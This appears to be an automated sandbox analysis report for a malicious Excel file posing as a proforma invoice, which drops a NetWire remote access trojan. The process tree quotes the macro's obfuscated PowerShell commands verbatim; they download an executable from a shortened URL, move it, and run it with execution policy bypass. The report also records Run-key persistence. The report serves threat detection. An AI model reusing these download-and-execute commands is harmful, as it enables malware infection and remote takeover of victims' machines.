Analysis
-
max time kernel
139s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 08:20
Static task
static1
Behavioral task
behavioral1
Sample
Proforma Invoice.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Proforma Invoice.xls
Resource
win10v20201028
General
-
Target
Proforma Invoice.xls
-
Size
74KB
-
MD5
55db711144ff4a35faf58d982e7cf727
-
SHA1
ea7b59dde9f0600915069dec66f8410f25cb66fd
-
SHA256
6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
-
SHA512
92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
Malware Config
Extracted
https://cutt.ly/ZhqUH1O
Signatures
-
NetWire RAT payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2152-32-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/2152-33-0x000000000040242D-mapping.dmp netwire behavioral2/memory/2152-35-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2392 2484 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2212 2484 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2980 2484 cmd.exe EXCEL.EXE -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 21 2140 powershell.exe 23 2140 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
vx.exevx.exepid process 3932 vx.exe 2152 vx.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
vx.exevx.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\"" vx.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ vx.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\system-update = "C:\\Users\\Admin\\AppData\\Roaming\\vx.exe" vx.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vx.exedescription pid process target process PID 3932 set thread context of 2152 3932 vx.exe vx.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2484 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2140 powershell.exe 1176 powershell.exe 1180 powershell.exe 1180 powershell.exe 2140 powershell.exe 1176 powershell.exe 2140 powershell.exe 1176 powershell.exe 1180 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exevx.exedescription pid process Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 3932 vx.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE 2484 EXCEL.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exepowershell.exevx.exedescription pid process target process PID 2484 wrote to memory of 2392 2484 EXCEL.EXE cmd.exe PID 2484 wrote to memory of 2392 2484 EXCEL.EXE cmd.exe PID 2484 wrote to memory of 2212 2484 EXCEL.EXE cmd.exe PID 2484 wrote to memory of 2212 2484 EXCEL.EXE cmd.exe PID 2484 wrote to memory of 2980 2484 EXCEL.EXE cmd.exe PID 2484 wrote to memory of 2980 2484 EXCEL.EXE cmd.exe PID 2212 wrote to memory of 1180 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 1180 2212 cmd.exe powershell.exe PID 2980 wrote to memory of 1176 2980 cmd.exe powershell.exe PID 2980 wrote to memory of 1176 2980 cmd.exe powershell.exe PID 2392 wrote to memory of 2140 2392 cmd.exe powershell.exe PID 2392 wrote to memory of 2140 2392 cmd.exe powershell.exe PID 1176 wrote to memory of 3932 1176 powershell.exe vx.exe PID 1176 wrote to memory of 3932 1176 powershell.exe vx.exe PID 1176 wrote to memory of 3932 1176 powershell.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe PID 3932 wrote to memory of 2152 3932 vx.exe vx.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Proforma Invoice.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\vx.exe"C:\Users\Admin\AppData\Roaming\vx.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\vx.exe"C:\Users\Admin\AppData\Roaming\vx.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
b35c81b90185530c116e245b74fa2a7b
SHA19ec3db80d69bc51a822eeb1ebc8df8eab4fd7b6a
SHA256d4bbe07ea9e4148a6cbc18a722daa292595d0244b409a6d1900405b822daa4f2
SHA512f99b7a101e2954e5b303823b4ecacd01a392c9121d6564585d18876de8bf8897e50f223a2b661b16d45df15d2cdf1b2aa35e1dc6148e54d9fc9e6d7602ca9e7e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
53ff4f3a2139752f904049fadc9fc3fc
SHA18953790df3647c06d8995cf2128d517e20304895
SHA2564c89a15f74dbb957b60a44950e5599af3eb42bde055b6731680165b0f1dd2819
SHA51244dda1bf184f58ec4cdda50227e5d3a6086993cffdc81f79a4fc9a7a1b6de1b47f128b96a154509d020247c46129b9706fc72ae5012397f3373e5515893e3d39
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
09822096b9f314b7b809ad7270b6b5fb
SHA19799abc42ba5adf16ff16894d4a8067accc57c30
SHA256adad65a8dd57585a16c982613f840710f8a5d152501d59b6b2f0cae455cf1e01
SHA51227f99d4030c1b477c3da53eaf2aa3fb331f1ae46697f6bf891e18932614ef283d0e7f142ce1b7dcc960d9956eaadbeb14205d051b13753cd0bd8c765862b567a
-
C:\Users\Admin\AppData\Roaming\vx.exeMD5
9635d5d0882e7ecd9234af3bfd2efa89
SHA110020cc25e075941784f0b969fe9466f7f61ac12
SHA256dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f
SHA512d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b
-
C:\Users\Admin\AppData\Roaming\vx.exeMD5
9635d5d0882e7ecd9234af3bfd2efa89
SHA110020cc25e075941784f0b969fe9466f7f61ac12
SHA256dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f
SHA512d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b
-
C:\Users\Admin\Documents\vx.exeMD5
9635d5d0882e7ecd9234af3bfd2efa89
SHA110020cc25e075941784f0b969fe9466f7f61ac12
SHA256dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f
SHA512d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b
-
memory/1176-9-0x0000000000000000-mapping.dmp
-
memory/1176-12-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmpFilesize
9.9MB
-
memory/1180-11-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmpFilesize
9.9MB
-
memory/1180-14-0x0000021B2DAE0000-0x0000021B2DAE1000-memory.dmpFilesize
4KB
-
memory/1180-8-0x0000000000000000-mapping.dmp
-
memory/2140-17-0x0000022337A30000-0x0000022337A31000-memory.dmpFilesize
4KB
-
memory/2140-13-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmpFilesize
9.9MB
-
memory/2140-10-0x0000000000000000-mapping.dmp
-
memory/2152-32-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2152-35-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2152-33-0x000000000040242D-mapping.dmp
-
memory/2212-6-0x0000000000000000-mapping.dmp
-
memory/2392-5-0x0000000000000000-mapping.dmp
-
memory/2484-0-0x00007FF803070000-0x00007FF8036A7000-memory.dmpFilesize
6.2MB
-
memory/2980-7-0x0000000000000000-mapping.dmp
-
memory/3932-29-0x0000000005430000-0x00000000054CB000-memory.dmpFilesize
620KB
-
memory/3932-30-0x00000000054D0000-0x000000000551D000-memory.dmpFilesize
308KB
-
memory/3932-31-0x0000000005550000-0x0000000005566000-memory.dmpFilesize
88KB
-
memory/3932-27-0x0000000000970000-0x0000000000971000-memory.dmpFilesize
4KB
-
memory/3932-26-0x0000000073D40000-0x000000007442E000-memory.dmpFilesize
6.9MB
-
memory/3932-23-0x0000000000000000-mapping.dmp